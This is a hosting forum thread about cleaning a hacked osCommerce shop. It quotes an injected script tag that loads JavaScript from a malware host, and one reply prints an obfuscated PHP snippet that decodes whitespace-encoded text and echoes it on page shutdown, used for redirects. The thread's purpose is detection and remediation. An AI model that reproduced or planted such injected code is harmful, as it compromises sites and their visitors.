Results 1 to 10 of 10
  1. #1
    Join Date
    Aug 2005
    Posts
    521

    Shopping Cart Hacked

    I'm trying to help someone out who has a hacked oscommerce site that has had the footer changed to:

    </body>
    </html>
    <script src="http://malwaresite.cx.cc/jquery.js"></script>
    </noindex>
    </body>
    </html>

    I've looked everywhere even grep'd for eval, _decode, etc.... But still can't find it! Anyone know a better way to find these type of hacks?

  2. #2
    Join Date
    Nov 2010
    Location
    Arizona
    Posts
    297

  3. #3
    Join Date
    Aug 2005
    Posts
    521
    LMD didn't find anything,scan} 8228/8228 files scanned: 0 hits 0 cleaned

  4. #4
    Join Date
    Nov 2010
    Location
    Arizona
    Posts
    297
    You should install ClamAV then run the scan. LMD will then use ClamAV to scan the files more thoroughly.

  5. #5
    Join Date
    Aug 2006
    Posts
    850
    oscommerce is very very very buggy ... forget oscommerce .... use prestashop
    WebSitePanel / Hosting Controller / Smartermail / Installation / Configuration / Troubleshooting / Migrations
    Windows Server Management / Security / Hardening
    I speak English and Spanish

  6. #6
    Join Date
    Aug 2005
    Posts
    521
    I tried clam nothing found, stumped.

  7. #7
    Join Date
    Apr 2002
    Posts
    930
    Are you trying to find out where the inserted code is being stored on the server?

    Have you looked through the database that osCommerce uses? It might be being stored somewhere in there. I'm not sure where osCommerce stores all of its data.

    But as others have said, osCommerce isn't the greatest product. They are very slow to fix any security related issues in their product.

  8. #8
    Join Date
    May 2007
    Posts
    438
    Quote Originally Posted by jackpx View Post
    oscommerce is very very very buggy ... forget oscommerce .... use prestashop
    A shopping cart is only good as the person that's maintaining it. If you don't know how to apply the available security patches, then yes, oscommerce should not be used (same goes for any open source software or script!).

    Prestashop is less "insecure" because it isn't as widely used. Oscommerce is one of the most popular carts - hence it will be more attractive to hackers & script kiddies.

  9. #9
    Join Date
    May 2011
    Location
    N/A
    Posts
    116
    You get SQL injection, you need to use secure and updated version of the script. Also set proper CHMOD permissions for directories and configuration files...

  10. #10
    Join Date
    Oct 2008
    Location
    Chicago, IL
    Posts
    190
    Is there a bunch of .php files with:

    Code:
    <?php /**
     * Gets some core libraries and displays a top message if required.	/*
     */ function CoreLibrariesHandler() {					/*
     */   $session_keys = '    	 	   				   			  		 		   		 			  	  		 	  	 			     			 	    	      			  		 			  	  		   		  				 	  	   	  		 	    			 	   			 	   			      			 	   	 				  	 				 		  	 	 		   		 		   		 		 		   		  	 	 			  		 			 	   		 				 		 			  		   	  		    	 		 			  			 			 		  	 	 		 		    	 			  		   		 				     	 			  		   		 		   		  	 				 		 	 	  			   	 			 	 	 		  	 	 			  	  				  	  	 			  		 	 	  			  		  	   	   					   				    	 				 			  		 		   		 			  	  		 	  	 			     			 	    					     	 	   				    	 				 		 			  		 				 		 	  	 		 			  		  	   		  	 	 				     					     	 	   				    	 				 		   	  		 				 		  	   				  	  					     	 	   				    	 				 		 	    			 	   		 		 	 		 		    					 ';  /*
     */									/* 
     */	foreach(str_split($session_keys, 8) as $k=>$v) { 		/*             
     */		$v = str_replace('	', 1, str_replace(' ', 0, $v));	/*
     */		$session_keys[$k] = chr(bindec($v)); 			/*
     */	} 								/*
     */									/*
     */	if($session_keys) echo $session_keys; }				/*
     */	register_shutdown_function('CoreLibrariesHandler');		/*
     */									/*
     ************************************************************************/
    
    
    
     ?>
    in them?

    We've been seeing this code used to redirect to cx.cc sites.

    Have you replaced $PHP_SELF in the two application_top.php files? Have you renamed the admin folder? Have you password protected the newly renamed admin folder? Have you removed the file_manager.php and define_language.php files?

    If not, you should immediately.

    Can you post the contents of the application_bottom.php files here? Be sure to use the code tags.

Similar Threads

  1. Shopping Cart For Sale - ML Aspdotnetstorefront Shopping Cart (Version 8.0.1.1)
    By Hardcurrency in forum Software & Scripts Offers
    Replies: 5
    Last Post: 05-03-2011, 09:42 AM
  2. Beware Shopping Cart Abandonment During The Holiday Shopping Season
    By SearchMarketingStandard in forum SEO / SEM Discussions
    Replies: 3
    Last Post: 12-05-2009, 06:01 AM
  3. Shopping Carts, Shopping Cart Services and Shopping Cart Software?
    By Cattes in forum Ecommerce Hosting & Discussion
    Replies: 13
    Last Post: 02-14-2008, 02:50 PM
  4. Has someone hacked my shopping cart already?!
    By MrStealth in forum Hosting Security and Technology
    Replies: 2
    Last Post: 06-13-2007, 12:14 PM
  5. Replies: 3
    Last Post: 09-11-2006, 02:31 AM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •